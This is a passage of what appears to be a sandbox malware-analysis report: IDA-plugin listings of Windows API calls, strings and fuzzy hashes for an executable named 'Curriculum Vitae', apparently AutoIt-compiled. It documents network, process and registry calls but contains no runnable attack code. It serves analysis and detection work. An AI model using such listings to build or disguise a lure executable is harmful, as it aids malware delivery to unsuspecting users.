                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC0A54
                      • _wcslen.LIBCMT ref: 00DC0A8A
                      • _wcslen.LIBCMT ref: 00DC0B06
                      • _wcslen.LIBCMT ref: 00DC0B81
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                        • Part of subcall function 00D92BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D92BFA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$MessageSend$BuffCharUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 1103490817-4258414348
                      • Opcode ID: 8d9f5d36d646d4f6f898c94dd4a6949881c4e65ac6af5115ca2ab8cae684f9e4
                      • Instruction ID: 0defc17fde73e58e5cbb602915662cd23613e7e73f7798788a588674175943ba
                      • Opcode Fuzzy Hash: 8d9f5d36d646d4f6f898c94dd4a6949881c4e65ac6af5115ca2ab8cae684f9e4
                      • Instruction Fuzzy Hash: 13E14735208702DFCB14DF24C450A6ABBE2FF98314B19895CE8969B762D731ED45CBB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 1256254125-909552448
                      • Opcode ID: 021e8f477b836d2cc217c3b2d93724f2bd66c51b3af5d18cebce9d715b8d53b2
                      • Instruction ID: ce55ebd3c34e84b979ca2dca21a24a611477a9e1bc076aea15cf0f87b19071be
                      • Opcode Fuzzy Hash: 021e8f477b836d2cc217c3b2d93724f2bd66c51b3af5d18cebce9d715b8d53b2
                      • Instruction Fuzzy Hash: B271C63262012ACBCB20DE6CCD515FF3791BB61754F296528FCA7AB294EA31CD4587B0
                      APIs
                      • _wcslen.LIBCMT ref: 00DC835A
                      • _wcslen.LIBCMT ref: 00DC836E
                      • _wcslen.LIBCMT ref: 00DC8391
                      • _wcslen.LIBCMT ref: 00DC83B4
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DC83F2
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DC5BF2), ref: 00DC844E
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DC8487
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DC84CA
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DC8501
                      • FreeLibrary.KERNEL32(?), ref: 00DC850D
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DC851D
                      • DestroyIcon.USER32(?,?,?,?,?,00DC5BF2), ref: 00DC852C
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DC8549
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DC8555
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                      • String ID: .dll$.exe$.icl
                      • API String ID: 799131459-1154884017
                      • Opcode ID: cca13d00195bae771338815b96c41844453b90373db9e1d5219c58ace6fbc60c
                      • Instruction ID: 5924684d9a440e6fc6ea20588a65ef63197d4d4ac448320b8daabbe0707d1f6b
                      • Opcode Fuzzy Hash: cca13d00195bae771338815b96c41844453b90373db9e1d5219c58ace6fbc60c
                      • Instruction Fuzzy Hash: A161CD7155421ABAEB18DF64CC41FBE77A8FB04721F10460AF915D71D1DBB4A980DBB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 0-1645009161
                      • Opcode ID: 1714f74564122ee40ed69dead4cd03deb9014388acbfe759902417bf3ca085c6
                      • Instruction ID: f0f6413043f4dc7b326f059c552466acd391112a93272fa0afac29228e125592
                      • Opcode Fuzzy Hash: 1714f74564122ee40ed69dead4cd03deb9014388acbfe759902417bf3ca085c6
                      • Instruction Fuzzy Hash: E181D6B1A04605BFDB21AF60DC42FAE77A9EF15301F084024FD09AB296EBB1D915D7B1
                      APIs
                      • LoadIconW.USER32(00000063), ref: 00D95A2E
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D95A40
                      • SetWindowTextW.USER32(?,?), ref: 00D95A57
                      • GetDlgItem.USER32(?,000003EA), ref: 00D95A6C
                      • SetWindowTextW.USER32(00000000,?), ref: 00D95A72
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95A82
                      • SetWindowTextW.USER32(00000000,?), ref: 00D95A88
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D95AA9
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D95AC3
                      • GetWindowRect.USER32(?,?), ref: 00D95ACC
                      • _wcslen.LIBCMT ref: 00D95B33
                      • SetWindowTextW.USER32(?,?), ref: 00D95B6F
                      • GetDesktopWindow.USER32 ref: 00D95B75
                      • GetWindowRect.USER32(00000000), ref: 00D95B7C
                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D95BD3
                      • GetClientRect.USER32(?,?), ref: 00D95BE0
                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D95C05
                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D95C2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                      • String ID:
                      • API String ID: 895679908-0
                      • Opcode ID: 78dce74b346536a6ff319de211ed136b67ac65e73a9c47b535a13e9bedfaa9e8
                      • Instruction ID: 83f0d4fa03c4ea0da7d1180babbb47eec550d2e3ba5903ea416deb8213c557a1
                      • Opcode Fuzzy Hash: 78dce74b346536a6ff319de211ed136b67ac65e73a9c47b535a13e9bedfaa9e8
                      • Instruction Fuzzy Hash: 74717D31900B06AFDB21DFA8DE85F6EBBF5FF48704F144528E586A26A4D775E940CB20
                      APIs
                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D500C6
                        • Part of subcall function 00D500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E0070C,00000FA0,CBE71E02,?,?,?,?,00D723B3,000000FF), ref: 00D5011C
                        • Part of subcall function 00D500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D723B3,000000FF), ref: 00D50127
                        • Part of subcall function 00D500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D723B3,000000FF), ref: 00D50138
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D5014E
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D5015C
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D5016A
                        • Part of subcall function 00D500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D50195
                        • Part of subcall function 00D500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D501A0
                      • ___scrt_fastfail.LIBCMT ref: 00D500E7
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      Strings
                      • SleepConditionVariableCS, xrefs: 00D50154
                      • InitializeConditionVariable, xrefs: 00D50148
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D50122
                      • WakeAllConditionVariable, xrefs: 00D50162
                      • kernel32.dll, xrefs: 00D50133
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 66158676-1714406822
                      • Opcode ID: 2a38a90143adf639d39f80469e9b22483e0f15769fd3e7c80341d0d9eff01336
                      • Instruction ID: 5d42543706a687089aa27270d68ad3fd4e925c67e445da85dd4c6bac0258a44b
                      • Opcode Fuzzy Hash: 2a38a90143adf639d39f80469e9b22483e0f15769fd3e7c80341d0d9eff01336
                      • Instruction Fuzzy Hash: D7212E32A447136FDB116B65AC05F6A3B94DB04B62F18013AFD05E33D1DFB49C088AB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 176396367-1603158881
                      APIs
                      • CharLowerBuffW.USER32(00000000,00000000,00DCCC08), ref: 00DA4527
                      • _wcslen.LIBCMT ref: 00DA453B
                      • _wcslen.LIBCMT ref: 00DA4599
                      • _wcslen.LIBCMT ref: 00DA45F4
                      • _wcslen.LIBCMT ref: 00DA463F
                      • _wcslen.LIBCMT ref: 00DA46A7
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                      • GetDriveTypeW.KERNEL32(?,00DF6BF0,00000061), ref: 00DA4743
                      Strings
                      Similarity
                      • API ID: _wcslen$BuffCharDriveLowerType
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2055661098-1000479233
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DragQueryPoint.SHELL32(?,?), ref: 00DC9147
                        • Part of subcall function 00DC7674: ClientToScreen.USER32(?,?), ref: 00DC769A
                        • Part of subcall function 00DC7674: GetWindowRect.USER32(?,?), ref: 00DC7710
                        • Part of subcall function 00DC7674: PtInRect.USER32(?,?,00DC8B89), ref: 00DC7720
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC91B0
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DC91BB
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DC91DE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DC9225
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC923E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DC9255
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DC9277
                      • DragFinish.SHELL32(?), ref: 00DC927E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DC9371
                      Strings
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                      • API String ID: 221274066-136824727
                      APIs
                      • _wcslen.LIBCMT ref: 00DBB198
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB1B0
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB1D4
                      • _wcslen.LIBCMT ref: 00DBB200
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB214
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB236
                      • _wcslen.LIBCMT ref: 00DBB332
                        • Part of subcall function 00DA05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DA05C6
                      • _wcslen.LIBCMT ref: 00DBB34B
                      • _wcslen.LIBCMT ref: 00DBB366
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DBB3B6
                      • GetLastError.KERNEL32(00000000), ref: 00DBB407
                      • CloseHandle.KERNEL32(?), ref: 00DBB439
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB44A
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB45C
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB46E
                      • CloseHandle.KERNEL32(?), ref: 00DBB4E3
                      Similarity
                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                      • String ID:
                      • API String ID: 2178637699-0
                      APIs
                      • GetMenuItemCount.USER32(00E01990), ref: 00D72F8D
                      • GetMenuItemCount.USER32(00E01990), ref: 00D7303D
                      • GetCursorPos.USER32(?), ref: 00D73081
                      • SetForegroundWindow.USER32(00000000), ref: 00D7308A
                      • TrackPopupMenuEx.USER32(00E01990,00000000,?,00000000,00000000,00000000), ref: 00D7309D
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D730A9
                      Strings
                      Similarity
                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                      • String ID: 0
                      • API String ID: 36266755-4108050209
                      APIs
                      • DestroyWindow.USER32(?,?), ref: 00DC6DEB
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DC6E5F
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DC6E81
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC6E94
                      • DestroyWindow.USER32(?), ref: 00DC6EB5
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D30000,00000000), ref: 00DC6EE4
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC6EFD
                      • GetDesktopWindow.USER32 ref: 00DC6F16
                      • GetWindowRect.USER32(00000000), ref: 00DC6F1D
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DC6F35
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DC6F4D
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      Strings
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                      • String ID: 0$tooltips_class32
                      • API String ID: 2429346358-3619404913
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DAC4B0
                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DAC4C3
                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DAC4D7
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DAC4F0
                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DAC533
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DAC549
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DAC554
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DAC584
                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DAC5DC
                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DAC5F0
                      • InternetCloseHandle.WININET(00000000), ref: 00DAC5FB
                      Strings
                      Similarity
                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                      • String ID:
                      • API String ID: 3800310941-3916222277
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00DC8592
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85A2
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85AD
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85BA
                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85C8
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85D7
                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85E0
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85E7
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85F8
                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00DCFC38,?), ref: 00DC8611
                      • GlobalFree.KERNEL32(00000000), ref: 00DC8621
                      • GetObjectW.GDI32(?,00000018,?), ref: 00DC8641
                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DC8671
                      • DeleteObject.GDI32(?), ref: 00DC8699
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DC86AF
                      Similarity
                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3840717409-0
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00DA1502
                      • VariantCopy.OLEAUT32(?,?), ref: 00DA150B
                      • VariantClear.OLEAUT32(?), ref: 00DA1517
                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DA15FB
                      • VarR8FromDec.OLEAUT32(?,?), ref: 00DA1657
                      • VariantInit.OLEAUT32(?), ref: 00DA1708
                      • SysFreeString.OLEAUT32(?), ref: 00DA178C
                      • VariantClear.OLEAUT32(?), ref: 00DA17D8
                      • VariantClear.OLEAUT32(?), ref: 00DA17E7
                      • VariantInit.OLEAUT32(00000000), ref: 00DA1823
                      Strings
                      Similarity
                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                      • API String ID: 1234038744-3931177956
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBB6F4
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBB772
                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00DBB80A
                      • RegCloseKey.ADVAPI32(?), ref: 00DBB87E
                      • RegCloseKey.ADVAPI32(?), ref: 00DBB89C
                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DBB8F2
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DBB904
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DBB922
                      • FreeLibrary.KERNEL32(00000000), ref: 00DBB983
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBB994
                      Strings
                      Similarity
                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 146587525-4033151799
                      APIs
                      • GetDC.USER32(00000000), ref: 00DB25D8
                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DB25E8
                      • CreateCompatibleDC.GDI32(?), ref: 00DB25F4
                      • SelectObject.GDI32(00000000,?), ref: 00DB2601
                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DB266D
                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DB26AC
                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DB26D0
                      • SelectObject.GDI32(?,?), ref: 00DB26D8
                      • DeleteObject.GDI32(?), ref: 00DB26E1
                      • DeleteDC.GDI32(?), ref: 00DB26E8
                      • ReleaseDC.USER32(00000000,?), ref: 00DB26F3
                      Strings
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 00D6DAA1
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D659
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D66B
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D67D
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D68F
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6A1
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6B3
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6C5
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6D7
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6E9
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6FB
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D70D
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D71F
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D731
                      • _free.LIBCMT ref: 00D6DA96
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6DAB8
                      • _free.LIBCMT ref: 00D6DACD
                      • _free.LIBCMT ref: 00D6DAD8
                      • _free.LIBCMT ref: 00D6DAFA
                      • _free.LIBCMT ref: 00D6DB0D
                      • _free.LIBCMT ref: 00D6DB1B
                      • _free.LIBCMT ref: 00D6DB26
                      • _free.LIBCMT ref: 00D6DB5E
                      • _free.LIBCMT ref: 00D6DB65
                      • _free.LIBCMT ref: 00D6DB82
                      • _free.LIBCMT ref: 00D6DB9A
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D9369C
                      • _wcslen.LIBCMT ref: 00D936A7
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D93797
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D9380C
                      • GetDlgCtrlID.USER32(?), ref: 00D9385D
                      • GetWindowRect.USER32(?,?), ref: 00D93882
                      • GetParent.USER32(?), ref: 00D938A0
                      • ScreenToClient.USER32(00000000), ref: 00D938A7
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D93921
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D9395D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                      • String ID: %s%u
                      • API String ID: 4010501982-679674701
                      • Opcode ID: 20de8cec72e3eabf5a18789b6f79680edcfdfa2d07664f20a65c1cfbdc71f69d
                      • Instruction ID: 4c07d999b33f16709433feec807dcbaf5db2e6a14b1a9ea75e1962fb8568a08b
                      • Opcode Fuzzy Hash: 20de8cec72e3eabf5a18789b6f79680edcfdfa2d07664f20a65c1cfbdc71f69d
